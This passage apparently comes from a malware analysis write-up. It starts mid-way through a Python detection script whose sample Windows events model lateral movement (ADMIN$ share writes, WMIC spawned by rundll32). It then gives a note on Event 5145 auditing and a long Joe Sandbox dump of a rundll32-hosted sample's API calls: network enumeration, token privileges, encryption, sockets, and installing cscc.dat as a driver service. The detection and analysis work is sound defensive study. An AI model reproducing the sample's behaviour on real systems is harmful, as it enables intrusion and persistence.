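     "RelativeTargetName": "cscc.dat", "AccessMask": "0x2"},
    {"EventID": 5145, "time": ts("2024-07-24 10:00:01"), "Computer": "SRV01",
     "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\IPC$",
     "RelativeTargetName": "srvsvc", "AccessMask": "0x12019f"},
    {"EventID": 1, "time": ts("2024-07-24 10:00:03"), "Computer": "WS01",
     "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ParentImage": "C:\\Windows\\System32\\rundll32.exe"},
    {"EventID": 1, "time": ts("2024-07-24 10:05:00"), "Computer": "WS01",
     "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 5145, "time": ts("2024-07-24 10:30:00"), "Computer": "SRV01",
     "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "patch.msi", "AccessMask": "0x2"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

Event 5145 is only generated when "Audit Detailed File Share" is enabled on the target; without it the share-side half of the chain is invisible and only the wmic_from_rundll32 rule fires. The correlation keys on the source address of the share write rather than on the dropped file name, so a renamed payload (the sample builds the name with wsprintfW) still produces a chain.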
                                              APIs
                                              • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04BF5805
                                              • GetSystemDefaultLCID.KERNEL32 ref: 04BF581D
                                              • GetTimeZoneInformation.KERNEL32(?), ref: 04BF582D
                                              • memcpy.MSVCRT ref: 04BF584B
                                              • NetWkstaGetInfo.NETAPI32(04C00494,00000064,?), ref: 04BF5861
                                              • memcpy.MSVCRT ref: 04BF58C7
                                              • memcpy.MSVCRT ref: 04BF58EA
                                              • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 04BF58F3
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04BF5924
                                              • memcpy.MSVCRT ref: 04BF5943
                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 04BF598C
                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 04BF59A2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                              • String ID:
                                              • API String ID: 2529142246-0
                                              • Opcode ID: 00f1d4c83a5b530fa69365f90e0df2830d089c0184b351a29726f245a0f61d82
                                              • Instruction ID: 303390a4ece42a3145533994c2beeec485e404324bdc2491a8383b8cd97b25d1
                                              • Opcode Fuzzy Hash: 00f1d4c83a5b530fa69365f90e0df2830d089c0184b351a29726f245a0f61d82
                                              • Instruction Fuzzy Hash: B3518571900206EFDB20DF64CC84E9ABBA9FF48314F058995EA5D97241E774EA54CB50
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,70204950,00000000), ref: 04BF8D80
                                              • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04BF8DA2
                                              • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04BF8DCE
                                              • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04BF8E07
                                              • htonl.WS2_32(00000000), ref: 04BF8E36
                                              • htonl.WS2_32(00000000), ref: 04BF8E44
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8E47
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04BF8E65
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8E6C
                                              • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04BF8E81
                                              • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04BF8E9A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                              • String ID:
                                              • API String ID: 4121633671-0
                                              • Opcode ID: 1fe11745313475f3c7f6a3d6ae11e3d3a9e894fcf5c07656fb48270ef20231cf
                                              • Instruction ID: 6bc203ec43a7f1bdb86d6f905d0aef2bb3e24b46c999ee6cabbd0b2351358b3b
                                              • Opcode Fuzzy Hash: 1fe11745313475f3c7f6a3d6ae11e3d3a9e894fcf5c07656fb48270ef20231cf
                                              • Instruction Fuzzy Hash: 1A41B5B1D00219AFDB11EFE9D884DDEFBBCFF48340B144496E61AE7210D774AA458BA0
                                              APIs
                                              • GetCurrentProcessId.KERNEL32(?,04BF8555,?,?), ref: 04BF8430
                                              • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04BF8555,?,?), ref: 04BF844C
                                              • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04BF8555,?,?), ref: 04BF8464
                                              • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04BF8555,?,?), ref: 04BF847D
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04BF84A3
                                              • CheckTokenMembership.ADVAPI32(?,?,?), ref: 04BF84BA
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BF84CB
                                              • FreeSid.ADVAPI32(?), ref: 04BF84D4
                                              • CloseHandle.KERNEL32(?), ref: 04BF84DD
                                              • CloseHandle.KERNEL32(?,?,?,?,04BF8555,?,?), ref: 04BF84E2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,04BF8555,?,?), ref: 04BF84E5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                              • String ID:
                                              • API String ID: 2191316301-0
                                              • Opcode ID: de4675a814809a006a11f5817453ea2662c4cd4d9eab6949a1fad0d298666b69
                                              • Instruction ID: 6d505f940cfc032753891159834e0f5df9fca0e19e8fdc7ef921176e7b31af2a
                                              • Opcode Fuzzy Hash: de4675a814809a006a11f5817453ea2662c4cd4d9eab6949a1fad0d298666b69
                                              • Instruction Fuzzy Hash: F9213B72900109BFEB10AFA4EC89EAEBB7DEF04781F004066FA0AA2150D7349E55DB71
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04BF79E8), ref: 04BF7CE9
                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04BF79E8), ref: 04BF7CF0
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04BF7D02
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BF7D25
                                              • GetLastError.KERNEL32(?,00000000), ref: 04BF7D2D
                                              • SetLastError.KERNEL32(?,?,00000000,?,?,?,04BF79E8), ref: 04BF7D3F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                              • String ID:
                                              • API String ID: 2365211911-0
                                              • Opcode ID: 061e4be4bd9b51e8aac1c8734da9b1a71da8ed08e8ffbb7942554cd4d2d24c71
                                              • Instruction ID: ff618a5e2d0db0bb729c128dd56e7192180a45c8fecac25dfdee3977b718e114
                                              • Opcode Fuzzy Hash: 061e4be4bd9b51e8aac1c8734da9b1a71da8ed08e8ffbb7942554cd4d2d24c71
                                              • Instruction Fuzzy Hash: 66110C75901218BFDB009FF5DC48AEFBFBCEB08750F1044A6EA09E2140D7749A599BE1
                                              APIs
                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04BF55BC
                                              • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04BF55CB
                                              • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04BF55DA
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF55EE
                                              • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF5601
                                              • LocalFree.KERNEL32(?), ref: 04BF5606
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptParam$Local$AllocFree
                                              • String ID:
                                              • API String ID: 3966954206-0
                                              • Opcode ID: 42db670e1f5381252843107971eab808f81f9760a63f4e19013add5d006798dd
                                              • Instruction ID: c5ec556fb7e6930a2f14bb40c46302aaf61f331cf4245c5b71fe8ff684ae7608
                                              • Opcode Fuzzy Hash: 42db670e1f5381252843107971eab808f81f9760a63f4e19013add5d006798dd
                                              • Instruction Fuzzy Hash: D50125B2900208BFEB119FA5DC84DAFBF7CEF44390F004466FA0AA2041D2349E54DAB0
                                              APIs
                                              • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 04BF5714
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 04BF571F
                                              • memcpy.MSVCRT ref: 04BF5736
                                              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF5750
                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 04BF576E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptEncryptLocal$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 55365748-0
                                              • Opcode ID: 27ab1a90dc0b73f5f29ba46a37f15b52916268e9d22f1b451a895d3e34d390b2
                                              • Instruction ID: 36604ae5a4e7b47aa4b3e3b4a21726303106508f60f0bc242c8a91870e981b92
                                              • Opcode Fuzzy Hash: 27ab1a90dc0b73f5f29ba46a37f15b52916268e9d22f1b451a895d3e34d390b2
                                              • Instruction Fuzzy Hash: 94215E75900215FFDF219FA5DC84A9FBFADEB08750F1040A5FA09A7251D6719A14CBA0
                                              APIs
                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04BF579E
                                              • LocalAlloc.KERNEL32(00000040,?,00000000,?,04BF5988,00000000,?,?,?,?,?,?,?,?), ref: 04BF57AD
                                              • CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 04BF57C6
                                              • LocalFree.KERNEL32(00000000,?,04BF5988,00000000,?,?,?,?,?,?,?,?), ref: 04BF57D6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: 10604c6d391d6321b79775a993acf002a286f7cf3e4a9bd40bf299f55676564f
                                              • Instruction ID: 3825657e92ba421bdddb6b1db24974ded2843a423d083be6e05099011ec877ac
                                              • Opcode Fuzzy Hash: 10604c6d391d6321b79775a993acf002a286f7cf3e4a9bd40bf299f55676564f
                                              • Instruction Fuzzy Hash: 3E0169B620020DFFEB118F98DC80EAE7BADEB44754F104066FA0897200E6B1EE059B70
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6260
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6273
                                              • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04BF62E9,?,?,?,?), ref: 04BF6289
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$CreateDataParam
                                              • String ID:
                                              • API String ID: 3669532303-0
                                              • Opcode ID: 5b7d39507cb4daf319d4c1ec0e3821bfd797cba1d7fec35999d19218dc875d95
                                              • Instruction ID: 234ee89dbce278ae04c16bf8cf9ed77ffb30c4479900e81a80ed35c3caa44333
                                              • Opcode Fuzzy Hash: 5b7d39507cb4daf319d4c1ec0e3821bfd797cba1d7fec35999d19218dc875d95
                                              • Instruction Fuzzy Hash: 77F0A9B5200308BFE7118FA5ED85E6B77BCFB44744B50446AF60AD7140D771AD059B20
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,771AF380,?,04BF4775), ref: 04BF29BF
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF29C8
                                              • GetProcessHeap.KERNEL32(00000008,00001124,?,04BF4775), ref: 04BF29DC
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF29DF
                                              • rand.MSVCRT ref: 04BF29F0
                                              • htons.WS2_32(00000050), ref: 04BF2A25
                                              • rand.MSVCRT ref: 04BF2A7E
                                              • rand.MSVCRT ref: 04BF2A96
                                              • send.WS2_32(00000000,00000000,00000054,00000000), ref: 04BF2ABB
                                              • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 04BF2AD2
                                              • rand.MSVCRT ref: 04BF2AE7
                                              • htons.WS2_32(00001120), ref: 04BF2B06
                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,04BF4775), ref: 04BF2B6A
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2B71
                                              • htons.WS2_32(0000015C), ref: 04BF2B90
                                              • rand.MSVCRT ref: 04BF2BBE
                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,04BF4775), ref: 04BF2BD2
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2BD9
                                              • htons.WS2_32(00000044), ref: 04BF2BF8
                                              • GetProcessHeap.KERNEL32(00000008,00001638,?,04BF4775), ref: 04BF2C58
                                              • HeapAlloc.KERNEL32(00000000,?,04BF4775), ref: 04BF2C5F
                                              • memcpy.MSVCRT ref: 04BF2C79
                                              • memcpy.MSVCRT ref: 04BF2C90
                                              • htons.WS2_32(00000050), ref: 04BF2C9A
                                              • memcpy.MSVCRT ref: 04BF2D17
                                              • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 04BF2D37
                                              • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 04BF2D4F
                                              • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 04BF2D86
                                              • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,04BF4775), ref: 04BF2DB3
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04BF4775), ref: 04BF2DBA
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DC6
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DCD
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DD9
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DE0
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,04BF4775), ref: 04BF2DE9
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2DF0
                                              • GetProcessHeap.KERNEL32(00000008,?,?,04BF4775), ref: 04BF2DFB
                                              • HeapFree.KERNEL32(00000000,?,04BF4775), ref: 04BF2E02
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                              • String ID:
                                              • API String ID: 2063504749-0
                                              • Opcode ID: 81fc4ef487607cb376e174c887547f2b1e40495943470c6a9c57ceb22f48c25b
                                              • Instruction ID: f1f4766e191f081568f19081af2a5920fcec998efef79fbbb6cd0e3c0eb0cf52
                                              • Opcode Fuzzy Hash: 81fc4ef487607cb376e174c887547f2b1e40495943470c6a9c57ceb22f48c25b
                                              • Instruction Fuzzy Hash: F5E1BF75900305EFEB14DFA4DC49BAA7BB8FF48710F10409AFA099B295E779E844CB64
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,771AF380,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?), ref: 04BF3D2B
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D34
                                              • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04BF3D46
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D49
                                              • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3D63
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D66
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?,?), ref: 04BF3E5B
                                              • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3E65
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3E68
                                              • rand.MSVCRT ref: 04BF3EC3
                                              • memset.MSVCRT ref: 04BF3EFC
                                                • Part of subcall function 04BF3209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF3220
                                                • Part of subcall function 04BF3209: HeapAlloc.KERNEL32(00000000,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF3227
                                                • Part of subcall function 04BF3209: htons.WS2_32(?), ref: 04BF3246
                                                • Part of subcall function 04BF3209: memcpy.MSVCRT ref: 04BF3276
                                                • Part of subcall function 04BF3209: send.WS2_32(?,00000000,?,00000000), ref: 04BF3287
                                                • Part of subcall function 04BF3209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF329A
                                                • Part of subcall function 04BF3209: HeapFree.KERNEL32(00000000), ref: 04BF32A1
                                              • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04BF3F38
                                              • htons.WS2_32(?), ref: 04BF3F5C
                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04BF3FF8
                                              • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04BF4063
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF406E
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4075
                                              • memcpy.MSVCRT ref: 04BF408F
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04BF4269,?,00000000,?,?), ref: 04BF40A0
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40A7
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?), ref: 04BF40B6
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40B9
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF40C2
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40C5
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF40D0
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF40D3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                              • String ID:
                                              • API String ID: 2208892845-0
                                              • Opcode ID: fbb6508b26b431187b0fef45500f58b3163db1c1991c44964116c06d5c7c5e8c
                                              • Instruction ID: 6aabbaa65701e8a213af0e0447eedb5487903bf581d58f739b2b62f0935c259f
                                              • Opcode Fuzzy Hash: fbb6508b26b431187b0fef45500f58b3163db1c1991c44964116c06d5c7c5e8c
                                              • Instruction Fuzzy Hash: B7D14CB0500344AFDB10DF69C884B6ABBE5FF49304F04859AFA8DDB292D779E845CB64
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF1408
                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04BF1427
                                              • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04BF1453
                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04BF147E
                                              • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04BF1495
                                              • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 04BF14B3
                                              • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 04BF14CB
                                              • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 04BF14E9
                                              • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04BF1501
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04BF1523
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                               • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                               • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Value$CloseOpenQuerywsprintf
                                              • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                              • API String ID: 693892761-175094307
                                              • Opcode ID: 2bbb0cff1acbae8503cccf917b70dbb49bc402334dc576fb974b2d796ccc2dc6
                                              • Instruction ID: f4bcea532bcbcf05fb3b5c230a2f2b36d136c81e1e2444cf64659e09d85fe5a5
                                              • Opcode Fuzzy Hash: 2bbb0cff1acbae8503cccf917b70dbb49bc402334dc576fb974b2d796ccc2dc6
                                              • Instruction Fuzzy Hash: 7F3162B1A4125DFAEB109F96DD45FBF7B7DEB44B44F1044A6BA05B2080E270BF089A61
                                              APIs
